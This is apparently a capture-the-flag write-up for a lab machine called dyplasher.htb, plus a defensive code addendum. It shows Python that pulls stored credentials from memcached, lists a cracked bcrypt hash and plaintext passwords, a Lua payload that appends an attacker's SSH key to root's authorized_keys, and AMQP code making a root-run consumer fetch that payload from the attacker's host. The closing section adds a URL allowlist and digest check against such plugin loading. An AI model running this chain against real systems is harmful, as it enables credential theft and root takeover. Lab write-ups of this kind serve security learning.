Writeup
http://test.dyplasher.htb:3000/felamos/memcached.git
Using python3 and bmemcached, we can get the hashed passwords of the users
on test.dyplasher.htb:3000:
import bmemcached
client = bmemcached.Client(('10.10.10.190:11211', ), 'felamos', 'zxcvbnm')
print(client.get('password'))
print(client.get('username'))
print(client.get('email'))
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK = mommy1
password: tieb0graQueg
root
2-To get root on your machine: make a file plugin.lua with contents
os.execute("echo '[PUB SSH KEY]' >> /root/.ssh/authorized_keys")
Replace [PUB SSH KEY] with your public key, located at /root/.ssh/id_rsa.pub.
import pika

# Connect to the local AMQP broker with the recovered credentials
connection = pika.BlockingConnection(
    pika.ConnectionParameters(
        '127.0.0.1',
        5672,
        credentials=pika.PlainCredentials('yuntao', 'EashAnicOc3Op')
    )
)
channel = connection.channel()
# The message body is the URL where plugin.lua is served
channel.basic_publish(
    exchange='plugin_data',
    routing_key='',
    body='http://[ip]:11211/plugin.lua'
)
connection.close()
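The steps above imply that whatever consumes the plugin_data exchange fetches the URL in the message body and runs the Lua file with root privileges, with no check on where it comes from. As an added example (not code from this writeup or from the box), here is a consumer-side gate that would refuse such a message; the allowlisted host, the pinned digest table, the sample URL and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import posixpath
from urllib.parse import urlsplit

# Assumed policy for illustration; none of these values come from the writeup.
ALLOWED_HOSTS = {"plugins.internal.example"}
REVIEWED_PLUGIN = b'print("reviewed plugin")\n'   # constructed sample content
PINNED_SHA256 = {"plugin.lua": hashlib.sha256(REVIEWED_PLUGIN).hexdigest()}


def check_plugin_url(url):
    """Return (ok, reason) for a URL received as a queue message body."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme != "https":
        return False, "scheme must be https"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    if parts.hostname not in ALLOWED_HOSTS:
        return False, "host not on allowlist"
    if port not in (None, 443):
        return False, "unexpected port"
    if posixpath.basename(parts.path) not in PINNED_SHA256:
        return False, "unknown plugin name"
    return True, "ok"


def check_plugin_content(name, content):
    """Compare downloaded bytes with the digest pinned for that plugin name."""
    expected = PINNED_SHA256.get(name)
    if expected is None:
        return False
    actual = hashlib.sha256(content).hexdigest()
    return hmac.compare_digest(actual, expected)


def vet(url, content):
    """Full gate: URL policy first, then content digest, before any execution."""
    ok, reason = check_plugin_url(url)
    if not ok:
        return False, reason
    name = posixpath.basename(urlsplit(url).path)
    if not check_plugin_content(name, content):
        return False, "digest mismatch"
    return True, "ok"
```

A consumer would call check_plugin_url before fetching anything and check_plugin_content on the downloaded bytes before handing them to the Lua interpreter, which should itself not run as root.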